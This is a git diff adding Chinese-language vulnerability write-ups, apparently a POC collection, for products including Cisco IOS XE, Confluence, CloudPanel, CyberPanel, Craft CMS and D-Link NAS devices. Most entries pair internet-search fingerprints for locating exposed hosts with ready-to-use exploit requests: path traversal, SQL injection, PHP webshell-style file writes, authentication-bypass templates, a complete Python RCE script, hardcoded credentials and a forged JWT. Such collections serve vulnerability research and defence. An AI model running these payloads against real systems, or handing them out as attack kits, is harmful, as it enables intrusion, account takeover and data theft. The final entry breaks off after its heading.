--- /dev/null
+++ b/Canal存在敏感信息泄露漏洞.md
@@ -0,0 +1,27 @@
+# Canal存在敏感信息泄露漏洞
+
+### 一、漏洞描述
+由于/api/v1/canal/config 未进行权限验证可直接访问，导致账户密码、accessKey、secretKey等一系列敏感信息泄露
+
+### 二、影响版本
+![1724655325946-ad9a7d05-7071-45fd-af16-6bbea6200466.png](./img/gC-N1JsYpGKl-Ujh/1724655325946-ad9a7d05-7071-45fd-af16-6bbea6200466-514319.png)
+
+### 三、漏洞复现
+```plain
+/api/v1/canal/config/1/0
+```
+
+```plain
+/api/v1/canal/config/0/9
+```
+
+```plain
+/api/v1/canal/instance/1
+```
+
+![1724655404641-4703126f-5cc5-4a11-b276-958eac455a81.png](./img/gC-N1JsYpGKl-Ujh/1724655404641-4703126f-5cc5-4a11-b276-958eac455a81-068083.png)
+
+
+
+> 更新: 2024-09-05 23:24:41  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ulgmpe74leezg156>
\ No newline at end of file
diff --git a/CellinxNVT摄像机GetFileContent.cgi任意文件读取漏洞.md b/CellinxNVT摄像机GetFileContent.cgi任意文件读取漏洞.md
new file mode 100644
index 0000000..39e532f
--- /dev/null
+++ b/CellinxNVT摄像机GetFileContent.cgi任意文件读取漏洞.md
@@ -0,0 +1,25 @@
+# Cellinx NVT 摄像机 GetFileContent.cgi 任意文件读取漏洞
+
+# 一、漏洞简介
+Cellinx NVT IP PTZ是韩国Cellinx公司的一个摄像机设备。Cellinx NVT v1.0.6.002b版本存在安全漏洞，该漏洞源于存在本地文件泄露漏洞，攻击者可读取系统密码等敏感信息。
+
+# 二、影响版本
++ Cellinx NVT 摄像机 
+
+# 三、资产测绘
++ hunter`web.body="local/NVT-string.js"`
++ 特征
+
+![1700147527163-e3d6c796-662b-461d-a2d8-c879b388bfb5.png](./img/qqGC1EAYOXIL_3Db/1700147527163-e3d6c796-662b-461d-a2d8-c879b388bfb5-628657.png)
+
+# 四、漏洞复现
+```plain
+/cgi-bin/GetFileContent.cgi?USER=root&PWD=D1D1D1D1D1D1D1D1D1D1D1D1A2A2B0A1D1D1D1D1D1D1D1D1D1D1D1D1D1D1B8D1&PATH=/etc/passwd&_=1672577046605
+```
+
+![1700147551526-19a4ef00-9add-4be1-af80-70fe238bd21c.png](./img/qqGC1EAYOXIL_3Db/1700147551526-19a4ef00-9add-4be1-af80-70fe238bd21c-591022.png)
+
+
+
+> 更新: 2024-02-29 23:57:13  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/hy0qp46w1tuklewg>
\ No newline at end of file
diff --git a/CheckPoint安全网关MyCRL存在任意文件读取漏洞.md b/CheckPoint安全网关MyCRL存在任意文件读取漏洞.md
new file mode 100644
index 0000000..8d825f1
--- /dev/null
+++ b/CheckPoint安全网关MyCRL存在任意文件读取漏洞.md
@@ -0,0 +1,32 @@
+# Check Point安全网关MyCRL存在任意文件读取漏洞
+
+# 一、漏洞简介
+  Check Point 安全网关是一种功能强大、可扩展的安全解决方案，旨在保护企业网络免受各种网络威胁和攻击它提供了多种安全功能，包括防火墙、虚拟专用网络（VPN）、入侵检测和预防系统（IDPS）、杂货邮件防护、网络地址转换（NAT）、负载均衡和安全信息和事件管理（SIEM）。这些功能使得Check Point 安全网关能够提供高性能、可扩展性和高度安全的保护，满足大型企业的需求。同时，Check Point 安全网关也提供了灵活的管理界面，易于配置和管理 ，Check Point 安全网关 MyCRL接口处存在任意文件读取漏洞，恶意攻击者可能利用该漏洞读取服务器上的敏感文件，例如客户记录、财务数据或源代码，导致数据泄露。
+
+# 二、影响版本
++ Check Point安全网关
+
+# 三、资产测绘
+```plain
+app="Check_Point-SSL-Network-Extender"
+```
+
+![1717150853799-cc0ca8e4-ecea-402e-8578-e8d88b708a16.png](./img/ig_1fSGctqaDq-Md/1717150853799-cc0ca8e4-ecea-402e-8578-e8d88b708a16-784297.png)
+
+# 四、漏洞复现
+```plain
+GET /../../../../etc/passwd HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Upgrade-Insecure-Requests: 1
+```
+
+![1717150867186-710fd67f-6c19-424f-8c63-7244fa5fac38.png](./img/ig_1fSGctqaDq-Md/1717150867186-710fd67f-6c19-424f-8c63-7244fa5fac38-692802.png)
+
+
+
+> 更新: 2024-06-01 11:17:59  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/sa59vno6cykie36p>
\ No newline at end of file
diff --git a/Cisco-IOS-XE-CVE-2023-20198权限提升漏洞.md b/Cisco-IOS-XE-CVE-2023-20198权限提升漏洞.md
new file mode 100644
index 0000000..6a79ad1
--- /dev/null
+++ b/Cisco-IOS-XE-CVE-2023-20198权限提升漏洞.md
@@ -0,0 +1,86 @@
+
+## Cisco IOS XE CVE-2023-20198权限提升漏洞
+
+
+## poc
+请参阅下面的示例请求，该请求绕过易受攻击的 IOS-XE 实例的身份验证。此 POC 创建一个名为baduser权限级别 15 的用户。让我们深入了解详细信息。
+
+
+![](https://p7i3u3x3.rocketcdn.me/wp-content/uploads/2023/10/Screenshot-2023-10-30-at-2.50.55-PM.png.webp)
+
+## CVE-2023-20198.yaml
+```
+id: CVE-2023-20198
+
+info:
+  name: Cisco IOS XE - Authentication Bypass
+  author: iamnoooob,rootxharsh,pdresearch
+  severity: critical
+  description: |
+    Cisco is aware of active exploitation of a previously unknown vulnerability in the web UI feature of Cisco IOS XE Software when exposed to the internet or to untrusted networks. This vulnerability allows a remote, unauthenticated attacker to create an account on an affected system with privilege level 15 access. The attacker can then use that account to gain control of the affected system.
+    For steps to close the attack vector for this vulnerability, see the Recommendations section of this advisory.
+    Cisco will provide updates on the status of this investigation and when a software patch is available.
+  impact: |
+    The CVE-2023-20198 vulnerability has a high impact on the system, allowing remote attackers to execute arbitrary code or cause a denial of service.
+  remediation: |
+    Apply the latest security patches or updates provided by the vendor to fix the CVE-2023-20198 vulnerability.
+  reference:
+    - https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/
+    - https://arstechnica.com/security/2023/10/actively-exploited-cisco-0-day-with-maximum-10-severity-gives-full-network-control/
+    - https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z
+    - https://www.cisa.gov/guidance-addressing-cisco-ios-xe-web-ui-vulnerabilities
+    - https://www.darkreading.com/vulnerabilities-threats/critical-unpatched-cisco-zero-day-bug-active-exploit
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10
+    cve-id: CVE-2023-20198
+    epss-score: 0.9556
+    epss-percentile: 0.99188
+    cpe: cpe:2.3:o:cisco:ios_xe:*:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: cisco
+    product: ios_xe
+    shodan-query: http.html_hash:1076109428
+    note: this template confirms vulnerable host with limited unauthenticated command execution, this does not include admin user creation + arbitrary cmd execution.
+  tags: cve,cve2023,kev,cisco,rce,auth-bypass
+variables:
+  cmd: uname -a
+
+http:
+  - raw:
+      - |-
+        POST /%2577eb%2575i_%2577sma_Http HTTP/1.1
+        Host: {{Hostname}}
+
+        <?xml version="1.0"?> <SOAP:Envelope xmlns:SOAP="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <SOAP:Header> <wsse:Security xmlns:wsse="http://schemas.xmlsoap.org/ws/2002/04/secext"> <wsse:UsernameToken SOAP:mustUnderstand="false"> <wsse:Username>admin</wsse:Username><wsse:Password>*****</wsse:Password></wsse:UsernameToken></wsse:Security></SOAP:Header><SOAP:Body><request correlator="exec1" xmlns="urn:cisco:wsma-exec"> <execCLI xsd="false"><cmd>{{cmd}}</cmd><dialogue><expect></expect><reply></reply></dialogue></execCLI></request></SOAP:Body></SOAP:Envelope>
+
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - XMLSchema
+          - execLog
+          - Cisco Systems
+          - <text>
+          - <received>
+        condition: and
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - <text>\n(.*)\[
+
+# digest: 4a0a004730450221009b40a4249142eed7d5189033384a64024e155f76f7ca4e22d7ed4e20ea8f578702201f8018ac440528d752437de795fd4e715fa868274f6b94acea7477db80fa0c57:922c64590222798bb761d5b6d8e72950
+
+```
+
+## 漏洞分析
+```
+https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/
+https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-theory-crafting/
+https://mp.weixin.qq.com/s/wH2mpYHTj6gLjMi3GgAKww
+```
diff --git a/CloudPanel-RCE漏洞-CVE-2023-35885.md b/CloudPanel-RCE漏洞-CVE-2023-35885.md
new file mode 100644
index 0000000..b92567b
--- /dev/null
+++ b/CloudPanel-RCE漏洞-CVE-2023-35885.md
@@ -0,0 +1,38 @@
+## CloudPanel RCE漏洞 CVE-2023-35885
+CloudPanel 是一个基于 Web 的控制面板或管理界面，旨在简化云托管环境的管理。它提供了一个集中式平台，用于管理云基础架构的各个方面，包括虚拟机 （VM）、存储、网络和应用程序。CloudPanel存在任意文件上传漏洞，攻击者可以通过接口创建PHP文件来获取服务器权限。
+
+## fofa
+```
+title=="CloudPanel | Log In"
+```
+
+`/file-manager/backend/makefile`接口创建文件
+```
+POST /file-manager/backend/makefile HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (compatible; MSIE 5.0; Windows NT 5.1; Trident/3.1)
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: keep-alive
+Cookie: clp-fm=ZGVmNTAyMDA5NjM3ZTZiYTlmNzQ3MDU1YTNhZGVlM2IxODczMTBjYjYwOTFiNDRmNmZjYTFjZjRiNmFhMTEwOTRiMmNiNTA5Zjc2YjY1ZGRkOWIwMGZmNjE2YWUzOTFiOTM5MDg0Y2U5YzBlMmM5ZTJlNGI3ZTM3NzQ1OTk2MjAxNTliOWUxYjE1ZWVlODYxNGVmOWVkZDVjMjFmYWZkYjczZDFhNGZhOGMyMmQyMmViMGM2YTkwYTE4ZDEzOTdkMmI4YWMwZmI0YWYyNTRmMjUzOTJlNzNiMGM4OWJmZTU0ZDA1NTIwYTJmMjI0MmM2NmQyOWJjNzJlZGExODA0NzBkZmU3YTRkYTM=
+Content-Length: 43
+Content-Type: application/x-www-form-urlencoded
+
+id=/htdocs/app/files/public/&name=confg.php
+```
+`/file-manager/backend/text`接口写入文件内容
+```
+
+POST /file-manager/backend/text HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (compatible; MSIE 5.0; Windows NT 5.1; Trident/3.1)
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: close
+Cookie: clp-fm=ZGVmNTAyMDA5NjM3ZTZiYTlmNzQ3MDU1YTNhZGVlM2IxODczMTBjYjYwOTFiNDRmNmZjYTFjZjRiNmFhMTEwOTRiMmNiNTA5Zjc2YjY1ZGRkOWIwMGZmNjE2YWUzOTFiOTM5MDg0Y2U5YzBlMmM5ZTJlNGI3ZTM3NzQ1OTk2MjAxNTliOWUxYjE1ZWVlODYxNGVmOWVkZDVjMjFmYWZkYjczZDFhNGZhOGMyMmQyMmViMGM2YTkwYTE4ZDEzOTdkMmI4YWMwZmI0YWYyNTRmMjUzOTJlNzNiMGM4OWJmZTU0ZDA1NTIwYTJmMjI0MmM2NmQyOWJjNzJlZGExODA0NzBkZmU3YTRkYTM=
+Content-Length: 93
+Content-Type: application/x-www-form-urlencoded
+
+id=/htdocs/app/files/public/confg.php&content=<?php system('id');phpinfo();unlink(__FILE__)?>
+```
+文件路径：url\public\confg.php
diff --git a/Cloudlog系统request_form存在SQL注入漏洞.md b/Cloudlog系统request_form存在SQL注入漏洞.md
new file mode 100644
index 0000000..b3c913d
--- /dev/null
+++ b/Cloudlog系统request_form存在SQL注入漏洞.md
@@ -0,0 +1,23 @@
+# Cloudlog系统request_form存在SQL注入漏洞
+
+Cloudlog系统接口request_form未授权SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息。
+
+## fofa
+
+```javascript
+icon_hash="-460032467"
+```
+
+## poc
+
+```javascript
+POST /index.php/oqrs/request_form HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Connection: close
+
+station_id=1 AND (SELECT 2469 FROM(SELECT COUNT(*),CONCAT(0x7162716b71,(SELECT (ELT(2469=2469,1))),0x7162716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
+```
+
+![image-20241219150127938](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412191501995.png)
\ No newline at end of file
diff --git a/Cloudlog系统接口delete_oqrs_line未授权SQL注入漏洞.md b/Cloudlog系统接口delete_oqrs_line未授权SQL注入漏洞.md
new file mode 100644
index 0000000..e8bd43c
--- /dev/null
+++ b/Cloudlog系统接口delete_oqrs_line未授权SQL注入漏洞.md
@@ -0,0 +1,23 @@
+# Cloudlog系统接口delete_oqrs_line未授权SQL注入漏洞
+
+Cloudlog系统接口delete_oqrs_line未授权SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息。
+
+## fofa
+
+```javascript
+icon_hash="-460032467"
+```
+
+## poc
+
+```javascript
+POST /index.php/oqrs/delete_oqrs_line HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Connection: close
+
+id=GTID_SUBSET(CONCAT((MID((IFNULL(CAST(VERSION() AS NCHAR),0x20)),1,190))),666)
+```
+
+![image-20241018155043747](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410181550829.png)
\ No newline at end of file
diff --git a/Confluence-未授权提权访问漏洞.md b/Confluence-未授权提权访问漏洞.md
new file mode 100644
index 0000000..fa9d31c
--- /dev/null
+++ b/Confluence-未授权提权访问漏洞.md
@@ -0,0 +1,54 @@
+## Confluence 未授权提权访问漏洞 CVE-2023-22515
+
+## fofa
+app="ATLASSIAN-Confluence"
+
+## poc yaml格式
+```
+variables:
+  username: "{{rand_base(10)}}"
+  password: "{{rand_base(10)}}"
+  email: "{{username}}@{{password}}"
+http:
+  - raw:
+      - |
+        GET /setup/setupadministrator-start.action HTTP/1.1
+        Host: {{Hostname}}
+      - |
+        GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=0&cache{{randstr}} HTTP/1.1
+        Host: {{Hostname}}
+      - |
+        GET /setup/setupadministrator-start.action HTTP/1.1
+        Host: {{Hostname}}
+      - |
+        @timeout:20s
+        POST /setup/setupadministrator.action HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        X-Atlassian-Token: no-check
+
+        username={{to_lower(username)}}&fullName=admin&email={{email}}.com&password={{password}}&confirm={{password}}&setup-next-button=Next
+      - |
+        POST /dologin.action HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        X-Atlassian-Token: no-check
+
+        os_username={{to_lower(username)}}&os_password={{password}}&login=Log+in&os_destination=%2Findex.action
+      - |
+        GET /welcome.action HTTP/1.1
+        Host: {{Hostname}}
+    cookie-reuse: true
+    redirects: true
+    matchers:
+      - type: dsl
+        dsl:
+          - contains(body_1, 'Setup is already complete')
+          - contains(body_3, 'Please configure the system administrator account for this Confluence installation')
+          - contains(location_5, '/index.action')
+          - status_code_5 == 302
+          - contains(body_6, 'Administration')
+        condition: and
+
+```
+
diff --git a/Craft-CMS远程代码执行漏洞CVE-2023-41892.md b/Craft-CMS远程代码执行漏洞CVE-2023-41892.md
new file mode 100644
index 0000000..fff12c3
--- /dev/null
+++ b/Craft-CMS远程代码执行漏洞CVE-2023-41892.md
@@ -0,0 +1,14 @@
+## Craft CMS远程代码执行漏洞CVE-2023-41892
+
+## 影响版本
+Craft CMS >= 4.0.0-RC1
+Craft CMS <= 4.4.14
+
+## exp
+```
+POST /index.php HTTP/1.1
+Host: {{Hostname}}
+Content-Type: application/x-www-form-urlencoded
+
+action=conditions/render&test[userCondition]=craft\elements\conditions\users\UserCondition&config={"name":"test[userCondition]","as xyz":{"class":"\\GuzzleHttp\\Psr7\\FnStream",    "__construct()": [{"close":null}],"_fn_close":"phpinfo"}}
+```
diff --git a/CrestronHDaj.html存在弱口令漏洞.md b/CrestronHDaj.html存在弱口令漏洞.md
new file mode 100644
index 0000000..8060e73
--- /dev/null
+++ b/CrestronHDaj.html存在弱口令漏洞.md
@@ -0,0 +1,26 @@
+# CrestronHD aj.html存在弱口令漏洞
+
+### 一、漏洞描述
+Crestron HD等系列设备 aj.html页面调用特定的参数可以获取账号密码等敏感信息
+
+### 二、影响版本
+<font style="color:#000000;">Crestron HD</font>
+
+### 三、资产测绘
+```plain
+app="Crestron-HD-RX-201-C-E"
+```
+
+![1721629595136-6f0f4040-d481-492a-8494-dea2c83b1283.png](./img/EPzjpeWI9nlnRK9k/1721629595136-6f0f4040-d481-492a-8494-dea2c83b1283-331289.png)
+
+### 四、漏洞复现
+```plain
+admin/admin
+```
+
+![1721629670119-17d4514c-c06e-406e-87a7-b511f5f3eb45.png](./img/EPzjpeWI9nlnRK9k/1721629670119-17d4514c-c06e-406e-87a7-b511f5f3eb45-577654.png)
+
+
+
+> 更新: 2024-08-12 17:48:53  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ek2kiaazq9fkwyo0>
\ No newline at end of file
diff --git a/CrestronHDaj.html存在账号密码泄漏漏洞.md b/CrestronHDaj.html存在账号密码泄漏漏洞.md
new file mode 100644
index 0000000..4b9ad7c
--- /dev/null
+++ b/CrestronHDaj.html存在账号密码泄漏漏洞.md
@@ -0,0 +1,26 @@
+# CrestronHD aj.html存在账号密码泄漏漏洞
+
+### 一、漏洞描述
+Crestron HD等系列设备 aj.html页面调用特定的参数可以获取账号密码等敏感信息
+
+### 二、影响版本
+<font style="color:#000000;">Crestron HD</font>
+
+### 三、资产测绘
+```plain
+app="Crestron-HD-RX-201-C-E"
+```
+
+![1721629595136-6f0f4040-d481-492a-8494-dea2c83b1283.png](./img/PPvFl06oFahLD99Q/1721629595136-6f0f4040-d481-492a-8494-dea2c83b1283-902289.png)
+
+### 四、漏洞复现
+```plain
+/aj.html?a=devi
+```
+
+![1721629619502-e589e5fa-400d-4d2f-b3b2-9c9af3fc7958.png](./img/PPvFl06oFahLD99Q/1721629619502-e589e5fa-400d-4d2f-b3b2-9c9af3fc7958-894426.png)
+
+
+
+> 更新: 2024-08-12 17:48:53  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/cdvmx13vg4wd8fyr>
\ No newline at end of file
diff --git a/CyberPanel需授权命令注入漏洞(CVE-2024-53376).md b/CyberPanel需授权命令注入漏洞(CVE-2024-53376).md
new file mode 100644
index 0000000..791f0ad
--- /dev/null
+++ b/CyberPanel需授权命令注入漏洞(CVE-2024-53376).md
@@ -0,0 +1,110 @@
+# CyberPanel需授权命令注入漏洞(CVE-2024-53376)
+
+CyberPanel开源面板存在一个命令注入漏洞,该漏洞允许远程认证用户构造恶意请求执行任意命令,导致服务器失陷,攻击者可以使用一个HTTP选项请求指示网络服务器运行CyberPanel应用程序执行任何命令。
+
+## 影响版本
+
+CyberPanel 版本 < 2.3.8 
+
+## fofa
+
+```javascript
+app="CyberPanel"
+```
+
+## poc
+
+```python
+#!/usr/bin/python3
+# CVE-2024-53376
+# Exploit Title: CyberPanel - Authenticated Remote Code Execution (RCE)
+# Exploit Author: Ryan Putman
+# Technical Details: https://github.com/ThottySploity/CVE-2024-53376
+# Date: 2024-12-15
+# Vendor Homepage: https://cyberpanel.net
+# Tested On: Cyberpanel < 2.3.8
+# Vulnerability Description:
+#   Command injection vulnerability in the submitWebsiteCreation endpoint
+
+import argparse, requests, json
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+
+# Disabling the SSL errors (since CyberPanel runs on a self signed cert)
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+arg_parser = argparse.ArgumentParser()
+arg_parser.add_argument('-t', metavar='target', help='ip address or domain of Cyberpanel', required=True)
+arg_parser.add_argument('-u', metavar='username', required=True)
+arg_parser.add_argument('-p', metavar='password', required=True)
+arg_parser.add_argument('-c', metavar='cmd', default='id > /tmp/rce #', help='command to execute')
+args = arg_parser.parse_args()
+
+# Obtaining the CSRF token used for authentication
+csrf_token = requests.get(args.t, verify=False).headers.get('Set-Cookie').split(';')[0]
+
+if len(csrf_token) > 0:
+    print(f"[+] Obtained the following CSRFTOKEN: {csrf_token}")
+
+payload = {
+    "username": args.u,
+    "password": args.p,
+    "languageSelection": "english",
+}
+
+headers = {
+    'Cookie': csrf_token,
+    'Accept': 'application/json',
+    'X-Csrftoken': csrf_token.replace('csrftoken=', ''),
+    'Origin': 'https://localhost:8090',
+    'Referer': 'https://localhost:8090/',
+    'Connection': 'close'
+}
+
+# Obtaining the sessionId used for authorization.
+sessionId = requests.post(
+    "{}/verifyLogin".format(args.t),
+    headers=headers,
+    data=json.dumps(payload),
+    verify=False,
+).headers.get('Set-Cookie').split(';')[1].replace(" Path=/, ", "")
+
+if len(sessionId) > 0:
+    print(f"[+] Obtained the following sessionId: {sessionId}")
+
+exploitHeaders = {
+    'Cookie': f'{csrf_token}; django_language=en; {sessionId}',
+    'Accept': 'application/json',
+    'X-Csrftoken': csrf_token.replace('csrftoken=', ''),
+    'Origin': 'https://localhost:8090',
+    'Referer': 'https://localhost:8090/',
+    'Connection': 'close'
+}
+
+exploitPayload = {
+    "package": "Default",
+    "domainName": "cyberpanel.net",
+    "adminEmail": "cyberpanel@gmail.com",
+    "phpSelection": f"PHP 8.0'; {args.c}; #",
+    "ssl":0,
+    "websiteOwner":"admin",
+    "dkimCheck":0,
+    "openBasedir":0,
+    "mailDomain":0,
+    "apacheBackend":0,
+}
+
+# Sending the exploit to the vulnerable endpoint
+exploitRequest = requests.options(f"{args.t}/websites/submitWebsiteCreation", headers=exploitHeaders, data=json.dumps(exploitPayload), verify=False)
+
+if exploitRequest.status_code == 200:
+    print("[+] Exploit succeeded")
+    print(f"[+] Executed: {args.c}")
+```
+
+
+
+
+
+## 漏洞来源
+
+- https://github.com/ThottySploity/CVE-2024-53376
\ No newline at end of file
diff --git a/D-LINK-Go-RT-AC750-GORTAC750_A1_FW_v101b03存在硬编码漏洞(CVE-2024-22853).md b/D-LINK-Go-RT-AC750-GORTAC750_A1_FW_v101b03存在硬编码漏洞(CVE-2024-22853).md
new file mode 100644
index 0000000..b2c0a0e
--- /dev/null
+++ b/D-LINK-Go-RT-AC750-GORTAC750_A1_FW_v101b03存在硬编码漏洞(CVE-2024-22853).md
@@ -0,0 +1,10 @@
+## D-LINK-Go-RT-AC750 GORTAC750_A1_FW_v101b03存在硬编码漏洞(CVE-2024-22853)
+
+D-LINK的Go-RT-AC750 RTAC750_A1_FW_v101b03固件在AlphaNetworks账户中使用了硬编码密码，远程攻击者可以通过telnet会话获得root权限。
+
+## poc
+
+```
+Alphanetworks:wrgac18_dlob.hans_ac750
+```
+
diff --git a/D-Link-NAS接口account_mg存在命令执行漏洞(CVE-2024-10914).md b/D-Link-NAS接口account_mg存在命令执行漏洞(CVE-2024-10914).md
new file mode 100644
index 0000000..393d9be
--- /dev/null
+++ b/D-Link-NAS接口account_mg存在命令执行漏洞(CVE-2024-10914).md
@@ -0,0 +1,31 @@
+# D-Link-NAS接口account_mg存在命令执行漏洞(CVE-2024-10914)
+D-Link NAS设备 account_mg存在命令执行漏洞
+
+## 影响版本
+```java
+DNS-320-版本 1.00
+DNS-320LW-版本 1.01.0914.2012
+DNS-325-版本 1.01和 1.02
+DNS-340L-版本 1.08
+```
+
+## fofa
+```java
+app="D_Link-DNS-ShareCenter"
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1731336110353-da817235-136a-49bd-9e02-241d826321d4.png)
+
+## poc
+```java
+GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27 HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
+Connection: close
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1731336023387-187f8fb1-9ff9-44a2-8e5d-f7ac5d81b3cc.png)
+
diff --git a/D-Link-NAS接口sc_mgr.cgi存在命令执行漏洞.md b/D-Link-NAS接口sc_mgr.cgi存在命令执行漏洞.md
new file mode 100644
index 0000000..45cd37d
--- /dev/null
+++ b/D-Link-NAS接口sc_mgr.cgi存在命令执行漏洞.md
@@ -0,0 +1,23 @@
+# D-Link-NAS接口sc_mgr.cgi存在命令执行漏洞
+D-Link-NAS接口sc_mgr.cgi存在命令执行漏洞
+
+## fofa
+```java
+body="/cgi-bin/login_mgr.cgi"  &&  body="cmd=cgi_get_ssl_info"
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1731336110353-da817235-136a-49bd-9e02-241d826321d4.png)
+
+## poc
+```java
+GET /cgi-bin/sc_mgr.cgi?cmd=SC_Get_Info HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
+Accept: */*
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: username=mopfdfsewo'& id & echo 'mopfdfsewo;
+```
+
+![image-20241122152945481](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411221529540.png)
+
diff --git a/D-LinkD-View8JWT认证绕过漏洞.md b/D-LinkD-View8JWT认证绕过漏洞.md
new file mode 100644
index 0000000..4137f88
--- /dev/null
+++ b/D-LinkD-View8JWT认证绕过漏洞.md
@@ -0,0 +1,31 @@
+# D-Link D-View 8 JWT认证绕过漏洞
+
+# 一、漏洞简介
+D-Link D-View 8是一款高度可定制且易于扩展的网络管理软件，可为任何规模的企业网络基础设施提供端到端的可管理性，支持多厂商设备监控和流量管理，提供实时网络概览和远程位置集中管理等功能。D-Link D-View 8在v2.0.1.28及之前版本中存在硬编码密钥漏洞，由于默认情况下，初始管理员的userId是相同的，未授权攻击者可以利用JWT密钥配合该userId伪造令牌，从而访问受保护的API路由。
+
+# 二、影响版本
++ D-Link D-View 8
+
+# 三、资产测绘
++ hunter`web.title="D-View 8"`
++ 特征
+
+![1701839567675-ed66c07f-aea6-4850-b7c7-c49d862e1d91.png](./img/v1c7cZkWlNWzcNJU/1701839567675-ed66c07f-aea6-4850-b7c7-c49d862e1d91-937841.png)
+
+# 四、漏洞复现
+```plain
+GET /dview8/api/usersByLevel HTTP/1.1
+Host: xx.xx.xx.xx
+Authorization: eyJhbGciOiAiSFMyNTYiLCJ0eXAiOiAiand0In0.eyJvcmdJZCI6ICIxMjM0NTY3OC0xMjM0LTEyMzQtMTIzNC0xMjM0NTY3ODA5YWEiLCJ1c2VySWQiOiAiNTkxNzFkNTYtZTZiNC00Nzg5LTkwZmYtYTdhMjdmZDQ4NTQ4IiwidHlwZSI6IDMsImtleSI6ICIxMjM0NTY3OC0xMjM0LTEyMzQtMTIzNC0xMjM0NTY3ODkwYmIiLCJpYXQiOiAxNjg2NzY1MTk4LCJqdGkiOiAiZmRhOGU1YzNlNWY1MTQ5MDMzZThiM2FkNWI3ZDhjMjUiLCJuYmYiOiAxNjg2NzYxNTk4LCJleHAiOiAxODQ0NDQ1MTk4fQ.5swhQdiev4r8ZDNkJAFVkGfRTIaUQlwVue2AI18CrcI
+```
+
+![1701839603018-11b6a9b7-e5b8-47e8-81db-8a15049decbd.png](./img/v1c7cZkWlNWzcNJU/1701839603018-11b6a9b7-e5b8-47e8-81db-8a15049decbd-081010.png)
+
+可通过获取的账号密码抓取登录数据包，替换用户名及加密密码后登录后台
+
+![1701839763056-977928a1-6f42-4bd7-b2db-4351ec46a01a.png](./img/v1c7cZkWlNWzcNJU/1701839763056-977928a1-6f42-4bd7-b2db-4351ec46a01a-839628.png)
+
+
+
+> 更新: 2024-02-29 23:57:12  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/usw057398ry1de8p>
\ No newline at end of file
diff --git a/D-LinkDAR上网行为审计网关importhtml远程命令执行漏洞.md b/D-LinkDAR上网行为审计网关importhtml远程命令执行漏洞.md
new file mode 100644
index 0000000..e75f427
--- /dev/null
+++ b/D-LinkDAR上网行为审计网关importhtml远程命令执行漏洞.md
@@ -0,0 +1,61 @@
+# D-Link DAR上网行为审计网关 importhtml远程命令执行漏洞
+
+# 一、漏洞简介
